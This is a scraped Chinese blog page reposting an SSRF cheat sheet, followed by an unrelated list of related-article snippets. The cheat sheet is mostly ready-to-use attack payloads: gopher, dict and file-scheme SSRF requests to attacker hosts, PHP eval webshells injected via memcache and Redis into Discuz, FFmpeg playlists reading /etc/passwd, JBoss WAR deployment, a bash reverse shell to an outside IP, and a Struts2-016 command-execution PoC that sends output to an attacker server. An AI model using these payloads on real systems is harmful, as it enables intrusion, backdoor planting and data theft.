Zvall
Zvall

SSRF Tips

SSRF PHP function

 
 
file_get_contents()
fsockopen()
curl_exec()

URL schema support

SFTP

 
 
http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/

evil.com:$ nc -v -l 11111
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
SSH-2.0-libssh2_1.4.2

Dict

 
 
http://0cx.cc/ssrf.php?dict://attacker:11111/

evil.com:$ nc -v -l 11111
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
CLIENT libcurl 7.40.0

gopher




 
 
// http://0cx.cc/ssrf.php?url=http://evil.com/gopher.php

        header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest');
?>

evil.com:# nc -v -l 12346
Listening on [0.0.0.0] (family 0, port 12346)
Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398)
HI
Multiline
test

TFTP

 
 
http://0cx.cc/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET

evil.com:# nc -v -u -l 12346
Listening on [0.0.0.0] (family 0, port 12346)
TESTUDPPACKEToctettsize0blksize512timeout6

file

 
 
http://0cx.cc/redirect.php?url=file:///etc/passwd

ldap

 
 
http://0cx.cc/redirect.php?url=ldap://localhost:11211/%0astats%0aquit

PHP-FPM

PHP-FPM universal SSRF bypass safe_mode/disabled_functions/o exploit

SSRF memcache Getshell

Generate serialize

 
 

    $code=array('global_start'=>'@eval($_REQUEST[\'eval\']);');
    echo serialize($code)."\n".strlen(serialize($code));

Output

 
 
a:1:{s:12:"global_start";s:25:"@eval($_REQUEST['eval']);";} //序列化数据
59  //字符串长度

webshell.php

 
 

//gopher可以换成如上其它方式
    header('Location: gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a');
?>

back.php

 
 

    header('Location: gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a');
?>

example Discuz

open the website

 
 
http://bbs.0cx.cc/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myvps/webshell.php?logo.jpg[/img]
http://bbs.0cx.cc/forum.php?mod=ajax&inajax=yes&action=getthreadtypes

clear data

 
 
http://bbs.0cx.cc/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myserver/back.php?logo.jpg[/img]

backdoor url

 
 
http://bbs.0cx.cc/data/cache/hello.php

SSRF Redis Getshell

Generate serialize

 
 

    $a['output']['preg']['search']['plugins'] = '/.*/e';
    $a['output']['preg']['replace']['plugins'] = '@eval($_POST['c']);';
    $a['rewritestatus']=1;
    $setting = serialize($a);
    echo $setting."\n".strlen($setting);
?>

Output

 
 
a:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";a:1:{s:7:"plugins";s:5:"/.*/e";}s:7:"replace";a:1:{s:7:"plugins";s:19:"@eval($_POST["c"]);";}}}s:13:"rewritestatus";i:1;}     //序列化数据
173     //字符串长度

example Discuz

Open website

 
 
http://192.168.80.116/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://you-vps-ip/ssrf.php?.jpg[/img]&formhash=818c8f44

Backdoor website

 
 
http://192.168.80.116/forum.php?mod=ajax&inajax=yes&action=getthreadtypes

FFmpeg

cat test.jpg

 
 
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://example.org/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

subfile

 
 
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://localhost/header.m3u8|subfile,,start,0,end,64,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,64,end,128,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,128,end,256,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,256,end,512,,:///etc/passwd
#EXT-X-ENDLIST

PostgreSQL

Exploit

 
 
> SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\nstats\n\​' password=1 port=11211 sslmode=disable','select
version();');

MongoDB

Exploit

 
 
> db.copyDatabase("\1\2\3\4\5\6\7",'test','localhost:8000')
> nc -l 8000 | hexdump -C
> db.copyDatabase(“\nstats\nquit”,’test’,’localhost:11211’)

CouchDB

exploit

 
 
http://localhost:5984/_users/_all_docs




 
 
HTTP/1.1 200 OK
Server: CouchDB/1.2.0 (Erlang OTP/R15B01)
ETag: "BD1WV12007V05JTG4X6YHIHCA"
Date: Tue, 18 Dec 2012 21:39:59 GMT
Content-Type: text/plain; charset=utf-8
Cache-Control: must-revalidate

{"total_rows":1,"offset":0,"rows":[
{"id":"_design/_auth","key":"_design/_auth","value":{"rev":"1-a8cfb993654bcc635f126724d39eb930"}}
]}

Attacker could also send requests from CouchDB server to intranet by using replication function


 
 
POST http://couchdb:5984/_replicate
Content-Type: application/json
Accept: application/json

{
    "source" : "recipes",
    "target" : "http://ssrf-me:11211/recipes",
}

Jboss

Jbosss POC

 
 
/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://our_public_internet_server/utils/cmd.war

写入shell

 
 
http://target.com/ueditor/jsp/getRemoteImage.jsp
POST:
    upfile=http://10.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOp%26name=jboss.system%3Aservice%3DMainDeployer%26methodIndex=3%26arg0=http%3A%2F%2F远端地址%2Fhtml5.war%23.jpg

 
 
http://target.com/ueditor/jsp/getRemoteImage.jsp
POST:
    upfile=http://内网IP:8080/html5/023.jsp%23.jpg

reverse shell

 
 
bash -i >& /dev/tcp/123.45.67.89/9999 0>&1

Weblogic

gopher.php

 
 

   header("Location:gopher://vps-ip:2333/_test");
?>

vuln website

 
 
https://example.com/uddiexplorer/SearchPublicRegistries.jsp
POST:
    operator=http://vps-ip/gopher.php&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

vps

 
 
> nc -lvv 2333

Connection from xx.xx.xx.xx port 2333 [tcp/snapp] accepted

Local File Read

 
 
http://www.xxx.com/redirect.php?url=file:///etc/passwd
http://www.xxx.com/redirect.php?url=file:///C:/Windows/win.ini

Bool SSRF

Struts2-016 POC

 
 
?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
//修改SERVER为你vps地址,返回结果在access.log中查看

SSRF Proxy

SSRF_Proxy

ssrfsocks

from:http://blog.safebuff.com/2016/07/03/SSRF-Tips/

你可能感兴趣的:(代码审计)

  • 代码审计与web安全选择题1 m0_74726609 代码审计网络安全
    软件供应链安全的基础是()A.完善的需求分析B.源代码安全C.渗透测试D.软件测试参考答案:B保证源代码安全的主要措施包括()A.开发工具和环境的安全B.代码安全C.渗透测试D.代码审计E.软件的说明文档完整参考答案:ABCD通过()技术,实现源代码在终端、网络及服务器存储场景下全周期的安全管理,防止内部代码有意、无意泄露、扩散出去。A.数据加B.数据脱C.数据安全隔离D.防火墙参考答案:C软件供
  • MyBatis中#{}与${}的实战避坑指南
    MyBatis在持久层框架中占据举足轻重的地位,其映射文件中的两种参数占位符——#{}与${}——常常令初学者困惑,也令资深开发者反复斟酌。笔者在日常代码审计与性能调优过程中,屡次遇到因二者混用而导致的生产事故,因此决定撰写一篇技术博客,结合真实项目片段,系统梳理二者的使用差异、安全边界与工程落地细节。全文约三千字,力求言必有据,例证皆来自可运行的源码仓库,读者可直接复现并验证。在MyBatis的
  • 【攻防世界】 web | fileclude 详细题解WP white-persist 攻防世界WEB前端android原型模式pythonphp
    【攻防世界】web|fileclude详细题解WP打开环境首先代码审计阅读代码,有include()函数并且有GET传参的file1、file2的两个参数,猜测是文件包含伪协议题目文件包含伪协议【攻防世界】web|file_include详细题解WP-CSDN博客在我的一篇博客中有过一些详细的介绍,需要的话可以看看核心突破点在于:file_get_contents($file2)===“hello
  • 底软基础 | 嵌入式程序员编程必看的525钟C/C++ 安全编程问题 TrustZone_ 面试0-1安全CC++
    《360安全规则集合》简称《安规集》,是一套详细的C/C++安全编程指南,由360集团质量工程部编著,将编程时需要注意的问题总结成若干规则,可为制定编程规范提供依据,也可为代码审计或相关培训提供指导意见,旨在提升软件产品的可靠性、健壮性、可移植性以及可维护性,从而提升软件产品的综合安全性能。原文链接:https://saferules.github.io/C/C++安全规则集合[外链图片转存中…(
  • 【Java代码审计 | 第五篇】XSS漏洞成因+实战案例 秋说 Java代码审计javaxss
    未经许可,不得转载。文章目录XSS漏洞成因1、直接输出用户输入2、在JSP中使用EL表达式输出用户输入3、在Thymeleaf模板中输出用户输入4、在JavaScript中嵌入用户输入实战案例案例1案例2案例3XSSXSS(跨站脚本攻击,Cross-SiteScripting)是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,使得这些脚本在用户的浏览器中执行。XSS攻击通常分为以下三种类
  • JavaScript代码审计工具 叶梓诺 javascript开发语言ecmascript前端
    我整理的一些关于【Java】的项目学习资料(附讲解~~)和大家一起分享、学习一下:https://d.51cto.com/bLN8S1如何实现一个JavaScript代码审计工具作为一名刚入行的小白,你可能对如何创建一个JavaScript代码审计工具感到困惑。在这篇文章中,我将引导你完成整个流程,并提供具体的代码示例和说明。我们将采取结构化的步骤来确保你能够理解每个阶段。流程概述创建JavaSc
  • 【代码审计】安全审核常见漏洞修复策略 秋说 Java代码审计网络安全代码审计
    文章目录1.异常信息泄露修复建议不推荐用法推荐用法2.文件上传漏洞错误示例(缺乏校验)安全示例(含格式/扩展名校验)3.SQL注入漏洞(MyBatis${})示例修复建议4.生成组件间接依赖生成依赖树建议5.间接依赖组件的漏洞什么是间接依赖后端修复1后端修复2前端修复1前端修复26.XSS(跨站脚本攻击)错误示例(存在风险)安全示例(自动转义)修复建议7.接口未鉴权修复建议8.路径遍历漏洞错误示例
  • 2025学年湖北省职业院校技能大赛 “信息安全管理与评估”赛项 样题卷(二) 落寞的魚丶 网络空间安全(职业技能大赛)#信息安全管理与评估赛项2025湖北职业技能大赛高职组信息安全评估赛项样题赛题网络加固
    2025学年湖北省职业院校技能大赛“信息安全管理与评估”赛项样题卷(二)第一部分:第二部分:网络安全事件响应、数字取证调查、应用程序安全任务书任务1:应急响应(可以培训有答案)任务2:通信数据分析取证(40分)任务3:基于Windows计算机单机取证(120分)第三部分应用程序安全任务4:HP代码审计(40分)第三部分:网络安全渗透、理论技能与职业素养任务一:人力资源管理系统(60分)可以培训任务
  • 2025学年湖北省职业院校技能大赛 “信息安全管理与评估”赛项 样题卷(四) 落寞的魚丶 网络空间安全(职业技能大赛)#信息安全管理与评估赛项2025职业湖北职业技能大赛职业技能大赛省赛高职组信息安全评估与管理赛项
    2025学年湖北省职业院校技能大赛“信息安全管理与评估”赛项样题卷(四)第二部分:网络安全事件响应、数字取证调查、应用程序安全任务书任务1:应急响应(可以培训有答案)任务2:通信数据分析取证(40分)任务3:基于Windows计算机单机取证(120分)任务4:PHP代码审计(40分)第三部分:网络安全渗透、理论技能与职业素养任务一:商城购物系统(60分)可以培训任务二:办公系统(60分)任务三:F
  • 【代码审计】通过类型转换绕过校验,实现任意账户密码重置 秋说 网络安全代码审计
    未经许可,不得转载。文章目录背景漏洞描述风险分析1.code字段默认值为02.empty(0)判断失效3.利用MySQL类型转换绕过empty限制复现验证修复建议背景在Web系统开发中,密码找回功能往往涉及用户邮箱与随机验证码的匹配校验。如果验证逻辑存在疏漏,可能会引发严重的安全问题,如任意账户密码重置等高危漏洞。本文将分析一个典型的逻辑漏洞案例,并结合MySQL的类型转换行为深入探讨其产生原因。
  • 2025学年湖北省职业院校技能大赛 “信息安全管理与评估”赛项 样题卷(五)
    2025学年湖北省职业院校技能大赛“信息安全管理与评估”赛项样题卷(五)第二部分:网络安全事件响应、数字取证调查、应用程序安全任务书任务1:应急响应(可以培训有答案)任务2:通信数据分析取证(40分)任务3:基于Windows计算机单机取证(120分)第三部分应用程序安全任务4:C代码审计(40分)第三部分:网络安全渗透、理论技能与职业素养任务一:门户网站(60分)可以培训任务二:办公系统(60分
  • 2025学年湖北省职业院校技能大赛 “信息安全管理与评估”赛项 样题卷(一) 落寞的魚丶 网络空间安全(职业技能大赛)#信息安全管理与评估赛项2025年湖北职业技能大赛信息安全评估赛项高职组赛题样题网安全配置
    2025学年湖北省职业院校技能大赛“信息安全管理与评估”赛项样题卷(一)第一部分:网络平台搭建与设备安全防护任务书DCRS:DCFW:DCWS:WAF:第二部分:网络安全事件响应、数字取证调查、应用程序安全任务书任务1:应急响应(可以培训有答案)任务2:通信数据分析取证(40分)任务3:基于Windows计算机单机取证(120分)第三部分应用程序安全任务4:Java代码审计(40分)第三部分:网络
  • 2025年渗透测试面试题总结-2025年HW(护网面试) 14(题目+回答)
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录1.SQL注入原理2.XXE攻击(XML外部实体注入)3.SQL注入分类⚙️4.Windows提权方法5.文件上传绕过技巧️6.代码审计核心要点7.逻辑漏洞类型8.验证码绕过方法️9.CSRF原理10.无工具的子域名收集2025年HW(护网面试)141、sql注入原理2、
  • 求助帖:学Java开发方向还是网络安全方向前景好 Jerry404_NotFound 安全java开发语言渗透代码审计Python网络安全
    最近网络安全被一个培训机构吹得天花乱坠,虽然他家既有网安又有java和UI,我也是学软件工程的(山西某211,此机构是每年和我们学校合作的校企公司),但那里的老师仍然大力推荐我学网络安全(渗透、代码审计)。培训机构邀请来的技术大佬还说软件开发方向不行了,高薪还是要看网安。而且听了他们说的话,我好像感觉我确实对Java开发敲代码之类的不怎么感兴趣(我的数学很差);我觉得网络安全还挺有意思的,还有一点
  • 网站漏洞检测方法有哪些
    在数字化时代,网站安全已成为企业和个人的生命线。一次数据泄露可能导致数百万损失,而黑客攻击平均仅需‌5分钟‌即可侵入未防护的系统。如何有效识别漏洞屏障?以下是经实践验证的四大核心方法:‌一、人工代码审计:深度挖掘隐藏风险‌‌原理‌:由安全工程师逐行审查源代码,定位逻辑漏洞(如越权访问、业务缺陷)。‌适用场景‌:金融系统、电商平台等高安全性需求场景。‌案例‌:某银行支付接口因未校验用户会话ID,被审
  • 代码审查如何保障信息系统安全?费用与代码长度啥关系? 智云软件测评服务 代码审计审查
    代码审查是保障信息系统安全的重要手段,它能揭示代码中的漏洞、潜在威胁以及违反规范的问题,并给出相应的修正建议。不过,这项服务的费用与代码的长度成正比,接下来我会详细说明这一点。代码审计作用代码与信息系统紧密相连,无论是进行设计开发还是对功能进行更新,都必须要依赖代码的操控。代码审计能够对信息系统的源代码进行全面审查,从全局的角度出发,发现并验证潜在的威胁,进而明确系统存在的安全风险。通过运用自动化
  • 2024届【校招】安全面试题和岗位总结(字节、百度、腾讯、美团等大厂)_百度安全工程师面试笔试 网络安全苏柒 学习网络安全web安全程序员面试
    写在前面个人强烈感觉面试因人而异,对于简历上有具体项目经历的同学,个人感觉面试官会着重让你介绍自己的项目,包括但不限于介绍一次真实攻防/渗透/挖洞/CTF/代码审计的经历=>因此对于自己的项目,面试前建议做一次复盘,最好能用文字描述出细节,在面试时才不会磕磕绊绊、或者忘了一些自己很得意的细节面试题会一直更新(大概,直到我毕业或者躺平为止吧…)包括一些身边同学(若他们同意的话)和牛客上扒拉下来的(若
  • 未授权访问漏洞利用链实战总结 Alfadi联盟 萧瑶 网络安全网络安全
    一、渗透测试核心思路攻击链路径:未授权访问→接口信息泄露→敏感数据获取→账户爆破→权限提升→系统控制二、关键步骤拆解与分析信息收集阶段初始突破口:系统登录页看似无效,但通过JS文件分析发现隐藏接口(如/productBase.do),体现代码审计重要性。目录爆破虽未果,但需结合其他手段(如框架特征、错误信息)辅助判断。技术栈识别:错误堆栈显示org.apache.struts.action.*,确
  • 鸿蒙系统固件提取与分析:深入底层的研究方法 操作系统内核探秘 OSharmonyos华为ai
    鸿蒙系统固件提取与分析:深入底层的研究方法关键词:鸿蒙系统、固件提取、系统分析、逆向工程、底层研究、嵌入式系统、设备固件摘要:本文深入探讨鸿蒙系统固件的提取与分析技术,系统讲解从固件获取到底层结构解析的完整流程。通过剖析鸿蒙系统的固件架构、启动流程及文件系统特性,结合实际案例演示固件解包、镜像解析和代码审计的关键技术。文章涵盖核心概念、数学原理、实战操作及工具推荐,为嵌入式系统开发者、安全研究员和
  • ctfshow web入门 nodejs334-338 瓜农ynnddddd 前端javascriptjava
    334.这题入门题,下载附件以.zip的格式打开,拿到源代码,进行代码审计,varexpress=require('express');varrouter=express.Router();varusers=require('../modules/user').items;varfindUser=function(name,password){returnusers.find(function(i
  • 7.2.安全防御 zizisuo 安全
    目录一、安全防御基础与核心原则安全防御的核心理念•CIA三元组(机密性、完整性、可用性)•最小权限原则与纵深防御策略安全开发周期(SDL)•需求阶段威胁建模(STRIDE)•代码审计与自动化扫描(SonarQube、Checkmarx)企业安全合规要求•GDPR、等保2.0、PCIDSS的核心条款解析•数据分类与加密策略(敏感数据识别、字段级加密)二、认证与授权防御体系认证安全实战•密码存储:BC
  • 某靶场自动化FUZZ文件上传接口+Bypass文件上传 afei00123 网络安全&云安全javascriptui开发语言web安全自动化
    目录1.前言2.自动化渗*透测*试3.漏*洞利*用3.1文件上传Bypass4.代码审计1.前言群里小伙伴扔了一个靶场,一看文件上传,存在upload.js文件,套路大概就是构造文件上传请求,可能在上传时需要Bypass一下,大差不差基本都是upload-labs的绕过方式,具体可参考:
  • 黑客网站学习 林代码er hack安全
    1、JarvisOJ网址:https://www.jarvisoj.com/2、BUUCTF网址:https://buuoj.cn/challenges3、websec网址:http://www.websec.fr4、ringzeroctf这是一个国外的网站,包含代码审计、逆向分析、漏洞攻击、Web、系统安全等。5、wargames基于游戏的让你学习安全技术和概念的黑客网站。网址:http://o
  • 【[De1CTF 2019]SSRF Me1】 白初& CTF-web-wppythonflaskweb安全
    目录代码审计整体代码逐块审计'/De1ta'路由waf函数exec()scan函数self.checkSign()getSign()解题过程代码审计整体代码#!/usr/bin/envpython#encoding=utf-8fromflaskimportFlaskfromflaskimportrequestimportsocketimporthashlibimporturllibimportsy
  • 【Java代码审计】反序列化漏洞篇 世界尽头与你 #代码审计java开发语言安全
    【Java代码审计】反序列化漏洞篇1.反序列化漏洞概述概述反序列化过程详解2.反序列化漏洞产生的必要条件3.反序列化漏洞检测方案代码审计白盒检测黑盒检测RASP检测攻击检测️4.普通反序列化漏洞5.XMLDecoder反序列化漏洞6.Java反序列化漏洞修复7.Java反序列化漏洞审计关键词1.反序列化漏洞概述概述发送方必须将要发送的Java对象序列化为字节流,接收方则需要将字节流再反序列化,还原
  • CodeQL结合GPT实现代码审计效率翻倍 代码审计gpt-3
    背景在软件开发中代码审计是确保代码安全性的重要环节。传统的代码审计方法常常依赖人工审查和静态分析工具,耗时且易于遗漏潜在问题。为了提升代码审计的效率,我引入了CodeQL和GPT的结合,利用CodeQL的强大分析能力和ChatGPT的自然语言处理能力,实现了代码审计效率的显著提升。技术方案我的方案基于两个核心工具:CodeQL和GPT。CodeQL是一种强大的代码分析工具,可以通过查询语言扫描和发
  • 2025年渗透测试面试题总结-拷打题库06(题目+回答) 独行soc 2025年渗透测试面试指南php开发语言中间件xss前端java数据挖掘
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录1.Sleep被禁用后的SQL注入2.XSS属性控制利用3.CSRF防护4.危险请求头5.XXE高发场景6.Java中间件漏洞7.IIS漏洞8.Python框架漏洞9.任意密码重置漏洞10.PHP代码审计要点11.绕过HTTP-OnlyCookie12.CTF经典题目
  • 如何审计一个智能合约 Chainlink资讯 预言机Chainlink智能合约智能合约区块链合约审计
    智能合约审计用于整个DeFi生态系统,通过对协议代码的深入审查,可以帮助解决识别错误、低效代码以及这些问题。智能合约具有不可篡改的特点,这使得审计成为任何区块链项目安全流程的关键部分。代码审计对任何应用程序都很重要,但它们对去中心化应用程序(dApp)尤其重要,因为它们建立在其之上的区块链是不可变的。如果代码漏洞导致用户资金丢失,这些资金将无法找回。迄今为止,DeFi中的黑客已经损失了超过50亿美
  • 代码审计--语言指南(go) jerry-Autumn 笔记golangiphone开发语言
    目录1通用类I.代码实现1.1内存管理1.2文件操作1.3系统接口1.4通信安全1.5敏感数据保护1.6加密解密1.7正则表达式2后台类I.代码实现1.1输入校验1.2SQL操作1.3网络请求1.4服务器端渲染1.5Web跨域1.6响应输出1.7会话管理1.8访问控制1.9并发保护通用类1.代码实现类1.1内存管理1.1.1【必须】切片长度校验在对slice进行操作时,必须判断长度是否合法,防止程
  • 【区块链安全 | 第三十四篇】合约审计之重入漏洞 秋说 区块链安全区块链安全
    文章目录概念漏洞代码代码审计攻击代码攻击过程总结示例修复建议审计思路概念以太坊的智能合约可以互相调用,也就是说,一个合约可以调用另一个合约的函数。除了外部账户,合约本身也可以持有以太币并进行转账。当合约接收到以太币时,通常会触发一个叫做fallback的函数来执行一些特定的操作。这就是所谓的“隐蔽的外部调用”。重入漏洞的问题出现在合约的外部调用上,尤其是当目标是一个恶意的合约时。攻击者可能会利用这
  • redis学习笔记——不仅仅是存取数据 Everyday都不同 returnSourceexpire/delincr/lpush数据库分区redis
    最近项目中用到比较多redis,感觉之前对它一直局限于get/set数据的层面。其实作为一个强大的NoSql数据库产品,如果好好利用它,会带来很多意想不到的效果。(因为我搞java,所以就从jedis的角度来补充一点东西吧。PS:不一定全,只是个人理解,不喜勿喷)   1、关于JedisPool.returnSource(Jedis jeids)   这个方法是从red
  • SQL性能优化-持续更新中。。。。。。 atongyeye oraclesql
    1 通过ROWID访问表--索引 你可以采用基于ROWID的访问方式情况,提高访问表的效率, , ROWID包含了表中记录的物理位置信息..ORACLE采用索引(INDEX)实现了数据和存放数据的物理位置(ROWID)之间的联系. 通常索引提供了快速访问ROWID的方法,因此那些基于索引列的查询就可以得到性能上的提高. 2 共享SQL语句--相同的sql放入缓存 3 选择最有效率的表
  • [JAVA语言]JAVA虚拟机对底层硬件的操控还不完善 comsci JAVA虚拟机
         如果我们用汇编语言编写一个直接读写CPU寄存器的代码段,然后利用这个代码段去控制被操作系统屏蔽的硬件资源,这对于JVM虚拟机显然是不合法的,对操作系统来讲,这样也是不合法的,但是如果是一个工程项目的确需要这样做,合同已经签了,我们又不能够这样做,怎么办呢? 那么一个精通汇编语言的那种X客,是否在这个时候就会发生某种至关重要的作用呢? &n
  • lvs- real 男人50 LVS
    #!/bin/bash # # Script to start LVS DR real server. # description: LVS DR real server # #.  /etc/rc.d/init.d/functions VIP=10.10.6.252 host='/bin/hostname' case "$1" in sta
  • 生成公钥和私钥 oloz DSA安全加密
    package com.msserver.core.util; import java.security.KeyPair; import java.security.PrivateKey; import java.security.PublicKey; import java.security.SecureRandom; public class SecurityUtil {
  • UIView 中加入的cocos2d,背景透明 374016526 cocos2dglClearColor
    要点是首先pixelFormat:kEAGLColorFormatRGBA8,必须有alpha层才能透明。然后view设置为透明glView.opaque = NO;[director setOpenGLView:glView];[self.viewController.view setBackgroundColor:[UIColor clearColor]];[self.viewControll
  • mysql常用命令 香水浓 mysql
    连接数据库 mysql -u troy -ptroy 备份表 mysqldump -u troy -ptroy mm_database mm_user_tbl > user.sql 恢复表(与恢复数据库命令相同) mysql -u troy -ptroy mm_database < user.sql 备份数据库 mysqldump -u troy -ptroy
  • 我的架构经验系列文章 - 后端架构 - 系统层面 agevs JavaScriptjquerycsshtml5
    系统层面: 高可用性 所谓高可用性也就是通过避免单独故障加上快速故障转移实现一旦某台物理服务器出现故障能实现故障快速恢复。一般来说,可以采用两种方式,如果可以做业务可以做负载均衡则通过负载均衡实现集群,然后针对每一台服务器进行监控,一旦发生故障则从集群中移除;如果业务只能有单点入口那么可以通过实现Standby机加上虚拟IP机制,实现Active机在出现故障之后虚拟IP转移到Standby的快速
  • 利用ant进行远程tomcat部署 aijuans tomcat
    在javaEE项目中,需要将工程部署到远程服务器上,如果部署的频率比较高,手动部署的方式就比较麻烦,可以利用Ant工具实现快捷的部署。这篇博文详细介绍了ant配置的步骤(http://www.cnblogs.com/GloriousOnion/archive/2012/12/18/2822817.html),但是在tomcat7以上不适用,需要修改配置,具体如下: 1.配置tomcat的用户角色
  • 获取复利总收入 baalwolf 获取
           public static void main(String args[]){         int money=200;         int year=1;         double rate=0.1; &
  • eclipse.ini解释 BigBird2012 eclipse
    大多数java开发者使用的都是eclipse,今天感兴趣去eclipse官网搜了一下eclipse.ini的配置,供大家参考,我会把关键的部分给大家用中文解释一下。还是推荐有问题不会直接搜谷歌,看官方文档,这样我们会知道问题的真面目是什么,对问题也有一个全面清晰的认识。 Overview 1、Eclipse.ini的作用 Eclipse startup is controlled by th
  • AngularJS实现分页功能 bijian1013 JavaScriptAngularJS分页
            对于大多数web应用来说显示项目列表是一种很常见的任务。通常情况下,我们的数据会比较多,无法很好地显示在单个页面中。在这种情况下,我们需要把数据以页的方式来展示,同时带有转到上一页和下一页的功能。既然在整个应用中这是一种很常见的需求,那么把这一功能抽象成一个通用的、可复用的分页(Paginator)服务是很有意义的。   &nbs
  • [Maven学习笔记三]Maven archetype bit1129 ArcheType
    archetype的英文意思是原型,Maven archetype表示创建Maven模块的模版,比如创建web项目,创建Spring项目等等.   mvn archetype提供了一种命令行交互式创建Maven项目或者模块的方式,   mvn archetype   1.在LearnMaven-ch03目录下,执行命令mvn archetype:gener
  • 【Java命令三】jps bit1129 Java命令
    jps很简单,用于显示当前运行的Java进程,也可以连接到远程服务器去查看   [hadoop@hadoop bin]$ jps -help usage: jps [-help] jps [-q] [-mlvV] [<hostid>] Definitions: <hostid>: <hostname>[:
  • ZABBIX2.2 2.4 等各版本之间的兼容性 ronin47
    zabbix更新很快,从2009年到现在已经更新多个版本,为了使用更多zabbix的新特性,随之而来的便是升级版本,zabbix版本兼容性是必须优先考虑的一点 客户端AGENT兼容 zabbix1.x到zabbix2.x的所有agent都兼容zabbix server2.4:如果你升级zabbix server,客户端是可以不做任何改变,除非你想使用agent的一些新特性。 Zabbix代理(p
  • unity 3d还是cocos2dx哪个适合游戏? brotherlamp unity自学unity教程unity视频unity资料unity
    unity 3d还是cocos2dx哪个适合游戏? 问:unity 3d还是cocos2dx哪个适合游戏? 答:首先目前来看unity视频教程因为是3d引擎,目前对2d支持并不完善,unity 3d 目前做2d普遍两种思路,一种是正交相机,3d画面2d视角,另一种是通过一些插件,动态创建mesh来绘制图形单元目前用的较多的是2d toolkit,ex2d,smooth moves,sm2,
  • 百度笔试题:一个已经排序好的很大的数组,现在给它划分成m段,每段长度不定,段长最长为k,然后段内打乱顺序,请设计一个算法对其进行重新排序 bylijinnan java算法面试百度招聘
    import java.util.Arrays; /** * 最早是在陈利人老师的微博看到这道题: * #面试题#An array with n elements which is K most sorted,就是每个element的初始位置和它最终的排序后的位置的距离不超过常数K * 设计一个排序算法。It should be faster than O(n*lgn)。
  • 获取checkbox复选框的值 chiangfai checkbox
    <title>CheckBox</title> <script type = "text/javascript"> doGetVal: function doGetVal() { //var fruitName = document.getElementById("apple").value;//根据
  • MySQLdb用户指南 chenchao051 mysqldb
    原网页被墙,放这里备用。 MySQLdb User's Guide Contents Introduction Installation _mysql MySQL C API translation MySQL C API function mapping Some _mysql examples MySQLdb
  • HIVE 窗口及分析函数 daizj hive窗口函数分析函数
    窗口函数应用场景: (1)用于分区排序 (2)动态Group By (3)Top N (4)累计计算 (5)层次查询 一、分析函数 用于等级、百分点、n分片等。 函数             说明 RANK()     &nbs
  • PHP ZipArchive 实现压缩解压Zip文件 dcj3sjt126com PHPzip
    PHP ZipArchive 是PHP自带的扩展类,可以轻松实现ZIP文件的压缩和解压,使用前首先要确保PHP ZIP 扩展已经开启,具体开启方法就不说了,不同的平台开启PHP扩增的方法网上都有,如有疑问欢迎交流。这里整理一下常用的示例供参考。 一、解压缩zip文件 01 02 03 04 05 06 07 08 09 10 11
  • 精彩英语贺词 dcj3sjt126com 英语
    I'm always here              我会一直在这里支持你                &nb
  • 基于Java注解的Spring的IoC功能 e200702084 javaspringbeanIOCOffice
                                      
  • java模拟post请求 geeksun java
    一般API接收客户端(比如网页、APP或其他应用服务)的请求,但在测试时需要模拟来自外界的请求,经探索,使用HttpComponentshttpClient可模拟Post提交请求。 此处用HttpComponents的httpclient来完成使命。 import org.apache.http.HttpEntity ; import org.apache.http.HttpRespon
  • Swift语法之 ---- ?和!区别 hongtoushizi ?swift!
    转载自: http://blog.sina.com.cn/s/blog_71715bf80102ux3v.html   Swift语言使用var定义变量,但和别的语言不同,Swift里不会自动给变量赋初始值,也就是说变量不会有默认值,所以要求使用变量之前必须要对其初始化。如果在使用变量之前不进行初始化就会报错: var stringValue : String //
  • centos7安装jdk1.7 jisonami jdkcentos
    安装JDK1.7 步骤1、解压tar包在当前目录 [root@localhost usr]#tar -xzvf jdk-7u75-linux-x64.tar.gz 步骤2:配置环境变量 在etc/profile文件下添加 export JAVA_HOME=/usr/java/jdk1.7.0_75 export CLASSPATH=/usr/java/jdk1.7.0_75/lib
  • 数据源架构模式之数据映射器 home198979 PHP架构数据映射器datamapper
